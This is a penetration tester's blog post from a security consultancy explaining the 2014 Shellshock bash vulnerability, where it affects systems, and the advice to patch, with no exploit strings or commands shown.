By: Stuart Rorer, Senior Consultant and Penetration Tester at A-LIGN
It seems with each passing day more and more vulnerabilities are being released, exposing gaping holes in the security of systems across the globe. Last week a security bulletin was released to the public that exposed a new threat, affecting a wide range of systems worldwide.
The vulnerability was found in the bash shell, a command line interpreter, which impacts many versions of the Unix, Linux, and Mac OS X Operating Systems. The bash shell is usually installed by default in most of these operating systems, and is often used as the default shell. Branded the name “Shellshock”, the vulnerability has been rated at the highest level by NIST, with a value of 10.
The exploit works by injecting a specific attack string into an environment variable that can be executed by the bash shell. This is a form of command injection, an attack that is currently rated number one in the OWASP Top Ten of commonly found exploits.
While there are many ways this security bug can be exploited, one of the most common ways is found in Web Servers that interact with the bash shell through a CGI application. Whether in the form of input from a user, or processing HTTP headers on the server side, if the injection string is interpreted by the bash command shell on a vulnerable system, the exploit will be carried out.
Shellshock is not restricted to web servers, it has also been found to exist in hardware with embedded versions of Linux. This would include many routers, as well as other hardware and devices. Additionally, the exploit has been seen to be applied even to some systems running DHCP servers in a Linux/Unix environment.
The bug is already being exploited on systems across the world. Uses of the bug are vast, and is only limited to the creativity of the attacker. Examples in the wild have seen it being used to create backdoors, delete files, or steal sensitive information. Shellshock is definitely a threat you will want to prevent from being exploited.
If you feel that your system may be vulnerable, the best thing you can do is apply the latest patch to the bash shell. Within Linux, and Unix environments, this can be done via a manual patching of the bash shell or through using your system’s package management system.
If you have additional questions about Shellshock or how A-LIGN can provide security assessment services for your organization, please call: 888-702-5446 or email us at firstname.lastname@example.org.
Vaughn-Nichols, S. (2014, September 26). Shellshock: How to protect your Unix, Linux and Mac servers | ZDNet. Retrieved September 26, 2014, from http://www.zdnet.com/shellshock-how-to-protect-your-unix-linux-and-mac-servers-7000034072/
Vulnerability Summary for CVE-2014-6271. (2014, September 24). Retrieved September 26, 2014, from http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271